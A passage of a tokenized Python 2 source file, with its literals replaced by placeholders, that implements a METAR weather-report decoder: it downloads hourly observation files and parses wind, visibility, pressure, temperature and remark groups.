'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> precipitation = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> obscuration = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> other = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> coverage = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> totalCloudCover = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:20> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:100> <EOL> } <EOL> visibilityCode = { <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> } <EOL> remarks = { <EOL> '<STR_LIT:$>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:E>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:N>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:S>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> obs = { } <EOL> orderedObs = [ ] <EOL> skipped = [ ] <EOL> weatherStations = None <EOL> timeStamp = None <EOL> data = [ ] <EOL> undecoded = { } <EOL> verbose = False <EOL> totalObs = <NUM_LIT:0> <EOL> hundred = <NUM_LIT:0> <EOL> notHundred = <NUM_LIT:0> <EOL> def __init__ ( self , verbose = False , decode = True , cycle = False ) : <EOL> self . verbose = verbose <EOL> self . currentCycle = cycle <EOL> if decode : <EOL> self . decode ( ) <EOL> def __contains__ ( self , item ) : <EOL> return ( item in self . obs ) <EOL> def __getitem__ ( self , item ) : <EOL> if isinstance ( item , int ) or isinstance ( item , long ) : <EOL> if item < <NUM_LIT:0> or item >= len ( self . obs ) : <EOL> raise IndexError ( item ) <EOL> else : <EOL> return self . obs [ self . orderedObs [ item ] ] <EOL> if not item in self . obs : <EOL> raise KeyError ( item ) <EOL> else : <EOL> return self . obs [ item ] <EOL> def __len__ ( self ) : <EOL> return len ( self . obs ) <EOL> def loadStations ( self ) : <EOL> if self . verbose : <EOL> sys . stdout . write ( "<STR_LIT>" ) <EOL> self . weatherStations = ALFlib . WeatherStationLoader ( <NUM_LIT:1> ) <EOL> if self . verbose : <EOL> sys . stdout . write ( "<STR_LIT>" ) <EOL> def decode ( self , argv = [ ] ) : <EOL> argc = len ( argv ) <EOL> if not self . weatherStations : <EOL> self . loadStations ( ) <EOL> utcNow = datetime . utcnow ( ) <EOL> hour = utcNow . hour <EOL> cycles = [ ] <EOL> if utcNow . minute < <NUM_LIT:50> : <EOL> hour -= <NUM_LIT:1> <EOL> if hour < <NUM_LIT:0> : <EOL> hour = <NUM_LIT> <EOL> cycles . append ( hour ) <EOL> if self . currentCycle : <EOL> hour = utcNow . hour <EOL> if utcNow . minute >= <NUM_LIT:50> : <EOL> hour += <NUM_LIT:1> <EOL> if hour > <NUM_LIT> : <EOL> hour = <NUM_LIT:0> <EOL> cycles . append ( hour ) <EOL> if self . verbose : <EOL> print utcNow + timedelta ( <NUM_LIT:1> ) <EOL> if self . verbose : <EOL> print "<STR_LIT>" <EOL> self . totalObs = <NUM_LIT:0> <EOL> self . hundred = <NUM_LIT:0> <EOL> self . notHundred = <NUM_LIT:0> <EOL> if self . obs : <EOL> self . obs = { } <EOL> self . orderedObs = [ ] <EOL> self . skipped = [ ] <EOL> for hour in cycles : <EOL> fileName = "<STR_LIT>" . format ( hour ) <EOL> source = "<STR_LIT>" . format ( fileName ) <EOL> iFP = urllib2 . urlopen ( source ) <EOL> if self . verbose : <EOL> print "<STR_LIT>" . format ( fileName , utcNow . hour , utcNow . minute ) <EOL> line = True <EOL> while line : <EOL> line = iFP . readline ( ) <EOL> try : <EOL> if len ( line ) > <NUM_LIT:15> : <EOL> if ( line [ <NUM_LIT:4> ] == "<STR_LIT:/>" ) and ( line [ <NUM_LIT:7> ] == "<STR_LIT:/>" ) and ( line [ <NUM_LIT> ] == "<STR_LIT::>" ) : <EOL> self . timeStamp = datetime ( int ( line [ <NUM_LIT:0> : <NUM_LIT:4> ] ) , int ( line [ <NUM_LIT:5> : <NUM_LIT:7> ] ) , int ( line [ <NUM_LIT:8> : <NUM_LIT:10> ] ) , int ( line [ <NUM_LIT:11> : <NUM_LIT> ] ) , int ( line [ <NUM_LIT> : <NUM_LIT:16> ] ) ) <EOL> else : <EOL> self . totalObs += <NUM_LIT:1> <EOL> self . data = line . split ( ) <EOL> ok2print = False <EOL> for index in range ( <NUM_LIT:0> , argc ) : <EOL> if line . find ( argv [ index ] ) != - <NUM_LIT:1> : <EOL> if ( index + <NUM_LIT:1> ) == argc : <EOL> ok2print = True <EOL> else : <EOL> break <EOL> observation = self . decodeMetar ( ) <EOL> if type ( observation ) == dict and '<STR_LIT>' in observation : <EOL> observation [ '<STR_LIT>' ] = line <EOL> if observation [ '<STR_LIT>' ] not in self . obs : <EOL> self . orderedObs . append ( observation [ '<STR_LIT>' ] ) <EOL> self . obs [ observation [ '<STR_LIT>' ] ] = observation <EOL> if observation [ '<STR_LIT>' ] [ '<STR_LIT>' ] != <NUM_LIT:100> : <EOL> self . notHundred += <NUM_LIT:1> <EOL> else : <EOL> self . hundred += <NUM_LIT:1> <EOL> for index in range ( <NUM_LIT:0> , argc ) : <EOL> if observation [ '<STR_LIT>' ] == argv [ index ] : <EOL> ok2print = True <EOL> else : <EOL> observation = "<STR_LIT>" . format ( observation , line ) <EOL> self . skipped . append ( observation ) <EOL> if ok2print : <EOL> print <EOL> if type ( observation ) == dict and '<STR_LIT>' in observation : <EOL> print "<STR_LIT>" . format ( observation [ '<STR_LIT>' ] ) <EOL> print "<STR_LIT>" <EOL> print observation <EOL> except Exception as e : <EOL> sys . stderr . write ( "<STR_LIT>" . format ( line , e ) ) <EOL> self . skipped . append ( "<STR_LIT>" . format ( line ) ) <EOL> iFP . close ( ) <EOL> self . orderedObs . sort ( ) <EOL> if argc == <NUM_LIT:1> : <EOL> if argv [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> for item in self . skipped : <EOL> print item <EOL> for ( key , value ) in self . undecoded . iteritems ( ) : <EOL> if argv [ <NUM_LIT:0> ] in value and value [ argv [ <NUM_LIT:0> ] ] > <NUM_LIT:0> : <EOL> print "<STR_LIT>" . format ( key , value ) <EOL> if self . verbose : <EOL> percent = int ( self . hundred / float ( self . hundred + self . notHundred ) * <NUM_LIT:100> ) <EOL> unique = <NUM_LIT:0> <EOL> for item in self . obs . itervalues ( ) : <EOL> if item [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:100> : <EOL> unique += <NUM_LIT:1> <EOL> uniquePercent = int ( unique / float ( len ( self . obs ) ) * <NUM_LIT:100> ) <EOL> print "<STR_LIT>" . format ( self . totalObs , len ( self . skipped ) , len ( self . obs ) ) <EOL> print "<STR_LIT>" . format ( self . hundred , percent , unique , uniquePercent ) <EOL> print "<STR_LIT>" . format ( self . notHundred , <NUM_LIT:100> - percent ) <EOL> def getNext ( self , success = True ) : <EOL> self . valueIndex += <NUM_LIT:1> <EOL> if success : <EOL> self . decoded += <NUM_LIT:1> <EOL> if self . foundRemark : <EOL> self . remarksDecoded += <NUM_LIT:1> <EOL> else : <EOL> self . standardDecoded += <NUM_LIT:1> <EOL> else : <EOL> idx = self . valueIndex - <NUM_LIT:1> <EOL> if idx >= <NUM_LIT:0> and idx < len ( self . data ) : <EOL> if not self . data [ idx ] in self . undecoded : <EOL> self . undecoded [ self . data [ idx ] ] = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> <EOL> } <EOL> if self . foundRemark : <EOL> self . undecoded [ self . data [ idx ] ] [ '<STR_LIT>' ] += <NUM_LIT:1> <EOL> else : <EOL> self . undecoded [ self . data [ idx ] ] [ '<STR_LIT>' ] += <NUM_LIT:1> <EOL> if self . valueIndex < len ( self . data ) : <EOL> value = self . data [ self . valueIndex ] <EOL> if ( value == '<STR_LIT>' ) or ( value == '<STR_LIT>' ) : <EOL> value = self . getNext ( ) <EOL> if ( self . valueIndex > <NUM_LIT:1> ) and ( value in self . weatherStations ) : <EOL> self . valueIndex = len ( self . data ) <EOL> return '<STR_LIT>' <EOL> elif ( len ( value ) >= <NUM_LIT:3> ) and ( value [ <NUM_LIT:0> : <NUM_LIT:3> ] == '<STR_LIT>' ) : <EOL> self . foundRemark = True <EOL> self . remarkIndex = self . valueIndex <EOL> value = self . getNext ( ) <EOL> if value : <EOL> try : <EOL> return value . decode ( ) <EOL> except Exception as e : <EOL> sys . stderr . write ( "<STR_LIT>" . format ( value ) ) <EOL> return self . getNext ( False ) <EOL> return '<STR_LIT>' <EOL> def peekNext ( self ) : <EOL> if ( self . valueIndex + <NUM_LIT:1> ) < len ( self . data ) : <EOL> try : <EOL> return self . data [ self . valueIndex + <NUM_LIT:1> ] . decode ( ) <EOL> except : <EOL> pass <EOL> return '<STR_LIT>' <EOL> def decodeMetar ( self ) : <EOL> obs = { <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:Name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> } , <EOL> '<STR_LIT>' : { <EOL> } , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> self . valueIndex = - <NUM_LIT:1> <EOL> self . decoded = <NUM_LIT:0> <EOL> self . standardDecoded = <NUM_LIT:0> <EOL> self . remarksDecoded = <NUM_LIT:0> <EOL> self . remarkIndex = len ( self . data ) <EOL> self . foundRemark = False <EOL> value = "<STR_LIT>" <EOL> if self . data : <EOL> value = self . getNext ( False ) <EOL> valLen = len ( value ) <EOL> if value == '<STR_LIT>' : <EOL> return "<STR_LIT>" <EOL> else : <EOL> if self . weatherStations and value not in self . weatherStations : <EOL> return "<STR_LIT>" <EOL> else : <EOL> station = self . weatherStations [ value ] <EOL> if not ( '<STR_LIT>' in station and isinstance ( station [ '<STR_LIT>' ] , float ) and '<STR_LIT>' in station and isinstance ( station [ '<STR_LIT>' ] , float ) ) : <EOL> return "<STR_LIT>" <EOL> if station [ '<STR_LIT>' ] < - <NUM_LIT> or station [ '<STR_LIT>' ] > <NUM_LIT> or station [ '<STR_LIT>' ] < - <NUM_LIT> or station [ '<STR_LIT>' ] > <NUM_LIT> : <EOL> return "<STR_LIT>" <EOL> obs [ '<STR_LIT>' ] = value <EOL> obs [ '<STR_LIT:Name>' ] = station [ '<STR_LIT:Name>' ] . title ( ) <EOL> obs [ '<STR_LIT>' ] = [ station [ '<STR_LIT>' ] , '<STR_LIT>' ] <EOL> obs [ '<STR_LIT>' ] = [ station [ '<STR_LIT>' ] , '<STR_LIT>' ] <EOL> if station [ '<STR_LIT>' ] : <EOL> obs [ '<STR_LIT>' ] = [ int ( station [ '<STR_LIT>' ] . strip ( '<STR_LIT:m>' ) ) , '<STR_LIT>' ] <EOL> obs [ '<STR_LIT>' ] = self . timeStamp <EOL> if station [ '<STR_LIT>' ] : <EOL> obs [ '<STR_LIT>' ] = station [ '<STR_LIT>' ] . title ( ) + "<STR_LIT>" + station [ '<STR_LIT>' ] . title ( ) <EOL> else : <EOL> obs [ '<STR_LIT>' ] = station [ '<STR_LIT>' ] . title ( ) <EOL> value = self . getNext ( ) <EOL> valLen = len ( value ) <EOL> wholeVis = <NUM_LIT:0> <EOL> visDecoded = False <EOL> windDecoded = False <EOL> issuanceDecoded = False <EOL> tempNdewDecoded = False <EOL> altDecoded = False <EOL> forecastConditions = False <EOL> while value : <EOL> getNext = True <EOL> success = False <EOL> if self . foundRemark : <EOL> success = True <EOL> if valLen > <NUM_LIT:2> and value [ <NUM_LIT:0> : <NUM_LIT:2> ] == '<STR_LIT>' : <EOL> if value in self . equipment : <EOL> obs [ '<STR_LIT>' ] = self . equipment [ value ] <EOL> else : <EOL> obs [ '<STR_LIT>' ] = value <EOL> elif valLen > <NUM_LIT:3> and value [ <NUM_LIT:0> : <NUM_LIT:3> ] == '<STR_LIT>' and value [ <NUM_LIT:3> : ] . isdigit ( ) : <EOL> obs [ '<STR_LIT>' ] = [ <NUM_LIT:1000> + ( float ( value [ <NUM_LIT:3> : ] ) / <NUM_LIT:10> ) , '<STR_LIT>' ] <EOL> elif value . count ( '<STR_LIT:->' ) == <NUM_LIT:1> and value . split ( '<STR_LIT:->' ) [ <NUM_LIT:0> ] in self . remarks and value . split ( '<STR_LIT:->' ) [ <NUM_LIT:1> ] in self . remarks : <EOL> values = value . split ( '<STR_LIT:->' ) <EOL> values [ <NUM_LIT:0> ] = self . remarks [ values [ <NUM_LIT:0> ] ] <EOL> values [ <NUM_LIT:1> ] = self . remarks [ values [ <NUM_LIT:1> ] ] <EOL> if values [ <NUM_LIT:0> ] . rsplit ( None , <NUM_LIT:1> ) [ <NUM_LIT:0> ] == values [ <NUM_LIT:1> ] . rsplit ( None , <NUM_LIT:1> ) [ <NUM_LIT:0> ] : <EOL> val = "<STR_LIT>" . format ( values [ <NUM_LIT:0> ] . rsplit ( None , <NUM_LIT:1> ) [ <NUM_LIT:1> ] , values [ <NUM_LIT:1> ] . rsplit ( None , <NUM_LIT:1> ) [ <NUM_LIT:1> ] ) <EOL> else : <EOL> val = "<STR_LIT>" . format ( values [ <NUM_LIT:0> ] , values [ <NUM_LIT:1> ] ) <EOL> obs [ '<STR_LIT>' ] . append ( val ) <EOL> elif valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> ] == '<STR_LIT:P>' and value [ <NUM_LIT:1> : ] . isdigit ( ) : <EOL> val = <NUM_LIT> * float ( value [ <NUM_LIT:1> : ] ) / <NUM_LIT:100> <EOL> obs [ '<STR_LIT>' ] = val / <NUM_LIT:10> <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( val ) ) <EOL> elif valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> ] == '<STR_LIT:1>' and value . isdigit ( ) : <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( self . decodeAutoMaintTemp ( value ) ) ) <EOL> elif valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> ] == '<STR_LIT:2>' and value . isdigit ( ) : <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( self . decodeAutoMaintTemp ( value ) ) ) <EOL> elif valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> ] == '<STR_LIT:3>' and value . isdigit ( ) : <EOL> val = <NUM_LIT> * float ( value [ <NUM_LIT:1> : ] ) / <NUM_LIT:100> <EOL> obs [ '<STR_LIT>' ] = val / <NUM_LIT:30> <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( val ) ) <EOL> elif valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> : <NUM_LIT:2> ] == '<STR_LIT>' and value [ <NUM_LIT:2> : ] . isdigit ( ) : <EOL> val = <NUM_LIT> * float ( value [ <NUM_LIT:2> : ] ) <EOL> obs [ '<STR_LIT>' ] = val / <NUM_LIT:10> <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( val ) ) <EOL> elif valLen == <NUM_LIT:9> and value [ <NUM_LIT:0> ] == '<STR_LIT:4>' and value . isdigit ( ) : <EOL> for desc , val in [ '<STR_LIT>' , value [ <NUM_LIT:1> : <NUM_LIT:5> ] ] , [ '<STR_LIT>' , value [ <NUM_LIT:5> : ] ] : <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( desc , self . decodeAutoMaintTemp ( val ) ) ) <EOL> elif valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> ] == '<STR_LIT:5>' and value . isdigit ( ) : <EOL> if value [ <NUM_LIT:2> : ] == '<STR_LIT>' : <EOL> val = "<STR_LIT>" <EOL> else : <EOL> val = "<STR_LIT>" . format ( float ( value [ <NUM_LIT:2> : ] ) / <NUM_LIT:10> ) <EOL> if value [ <NUM_LIT:1> ] in self . pressureTendency : <EOL> val = "<STR_LIT:U+0020>" + self . pressureTendency [ value [ <NUM_LIT:1> ] ] + val <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( val ) ) <EOL> elif valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> ] == '<STR_LIT>' and value . isdigit ( ) : <EOL> val = <NUM_LIT> * float ( value [ <NUM_LIT:1> : ] ) / <NUM_LIT:100> <EOL> obs [ '<STR_LIT>' ] = val / <NUM_LIT> <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( val ) ) <EOL> elif valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> ] == '<STR_LIT>' and value . isdigit ( ) : <EOL> val = <NUM_LIT> * float ( value [ <NUM_LIT:1> : ] ) / <NUM_LIT:100> <EOL> obs [ '<STR_LIT>' ] = val / <NUM_LIT> <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( val ) ) <EOL> elif valLen == <NUM_LIT:6> and value [ <NUM_LIT:0> : <NUM_LIT:3> ] == '<STR_LIT>' and value . isdigit ( ) : <EOL> val = <NUM_LIT> * float ( value [ <NUM_LIT:2> : ] ) / <NUM_LIT:10> <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( val ) ) <EOL> elif valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> : <NUM_LIT:2> ] == '<STR_LIT>' and value . isdigit ( ) : <EOL> val = int ( value [ <NUM_LIT:2> : ] ) <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( val ) ) <EOL> elif valLen == <NUM_LIT:9> and value [ <NUM_LIT:0> ] == '<STR_LIT:T>' and value [ <NUM_LIT:1> : ] . isdigit ( ) : <EOL> for desc , val in [ '<STR_LIT>' , value [ <NUM_LIT:1> : <NUM_LIT:5> ] ] , [ '<STR_LIT>' , value [ <NUM_LIT:5> : ] ] : <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( desc , self . decodeAutoMaintTemp ( val ) ) ) <EOL> elif value in self . visibilityCode : <EOL> pass <EOL> else : <EOL> success = False <EOL> if not success : <EOL> success = True <EOL> if valLen >= <NUM_LIT:7> and value [ <NUM_LIT:0> : <NUM_LIT:6> ] . isdigit ( ) and value [ <NUM_LIT:6> ] == '<STR_LIT>' : <EOL> if issuanceDecoded : <EOL> success = False <EOL> else : <EOL> issuanceDecoded = True <EOL> values = value . split ( '<STR_LIT>' ) <EOL> day = int ( values [ <NUM_LIT:0> ] [ <NUM_LIT:0> : <NUM_LIT:2> ] ) <EOL> month = self . timeStamp . month <EOL> year = self . timeStamp . year <EOL> if abs ( day - self . timeStamp . day ) > <NUM_LIT:20> : <EOL> if self . timeStamp . day > day : <EOL> month += <NUM_LIT:1> <EOL> if month > <NUM_LIT:12> : <EOL> year += <NUM_LIT:1> <EOL> month = <NUM_LIT:1> <EOL> else : <EOL> month -= <NUM_LIT:1> <EOL> if month <= <NUM_LIT:0> : <EOL> year -= <NUM_LIT:1> <EOL> month = <NUM_LIT:12> <EOL> obs [ '<STR_LIT>' ] = datetime ( year , month , day , int ( values [ <NUM_LIT:0> ] [ <NUM_LIT:2> : <NUM_LIT:4> ] ) , int ( values [ <NUM_LIT:0> ] [ <NUM_LIT:4> : <NUM_LIT:6> ] ) ) <EOL> if len ( values ) > <NUM_LIT:1> and values [ <NUM_LIT:1> ] : <EOL> value = values [ <NUM_LIT:1> ] <EOL> valLen = len ( value ) <EOL> getNext = False <EOL> elif value in self . obsType : <EOL> obs [ '<STR_LIT>' ] = self . obsType [ value ] <EOL> elif value . endswith ( '<STR_LIT>' ) or value . endswith ( '<STR_LIT>' ) or value . endswith ( '<STR_LIT>' ) or value . endswith ( '<STR_LIT>' ) : <EOL> if windDecoded and not ( self . foundRemark or forecastConditions ) : <EOL> success = False <EOL> else : <EOL> windDecoded = True <EOL> if self . foundRemark : <EOL> obs [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : self . decodeWindConditions ( value ) } ) <EOL> elif forecastConditions : <EOL> obs [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : self . decodeWindConditions ( value ) } ) <EOL> else : <EOL> obs [ '<STR_LIT>' ] = self . decodeWindConditions ( value ) <EOL> elif ( valLen <= <NUM_LIT:2> ) and value . isdigit ( ) : <EOL> if visDecoded and not ( self . foundRemark or forecastConditions ) : <EOL> success = False <EOL> else : <EOL> wholeVis = int ( value ) <EOL> elif valLen > <NUM_LIT:2> and value . endswith ( '<STR_LIT>' ) : <EOL> if visDecoded and not ( self . foundRemark or forecastConditions ) : <EOL> success = False <EOL> else : <EOL> visDecoded = True <EOL> if value [ <NUM_LIT:0> ] in self . qualifier : <EOL> val = self . qualifier [ value [ <NUM_LIT:0> ] ] <EOL> value = value [ <NUM_LIT:1> : valLen ] <EOL> valLen = len ( value ) <EOL> else : <EOL> val = None <EOL> val = None <EOL> value = value [ <NUM_LIT:0> : ( valLen - <NUM_LIT:2> ) ] . split ( '<STR_LIT:/>' ) <EOL> valLen = len ( value ) <EOL> if valLen > <NUM_LIT:1> : <EOL> if value [ <NUM_LIT:0> ] . isdigit ( ) and value [ <NUM_LIT:1> ] . isdigit ( ) : <EOL> val = ( wholeVis + ( float ( value [ <NUM_LIT:0> ] ) / float ( value [ 